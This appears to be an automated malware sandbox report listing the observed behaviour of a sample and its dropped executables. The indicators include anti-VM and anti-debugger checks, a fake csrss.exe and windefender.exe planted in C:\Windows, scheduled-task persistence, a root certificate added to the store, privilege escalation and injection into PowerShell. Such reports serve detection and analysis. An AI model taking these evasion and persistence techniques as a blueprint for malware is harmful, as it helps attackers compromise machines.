File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u2sg.1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u2sg.1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u2sg.1.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Modifies data under HKEY_USERS

The writes below land under HKU\.DEFAULT, the hive used by the LocalSystem account, so their main value is as evidence that VMpmSW5lQOTKnoodNjiG90GW.exe, windefender.exe and the spawned powershell.exe were running as SYSTEM. The tzres.dll strings are MuiCache entries written when time-zone display names are loaded, and the empty SystemCertificates keys are created when PowerShell initialises its certificate stores; none of them is an attacker-chosen value.
Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-201 = "US Mountain Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-562 = "SE Asia Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1972 = "Belarus Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2342 = "Haiti Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-371 = "Jerusalem Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" C:\Windows\windefender.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = (certificate blob omitted) C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe N/A
N/A N/A C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe N/A
N/A N/A C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe N/A
N/A N/A C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
N/A N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
N/A N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
N/A N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
N/A N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
N/A N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
N/A N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
N/A N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3192 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
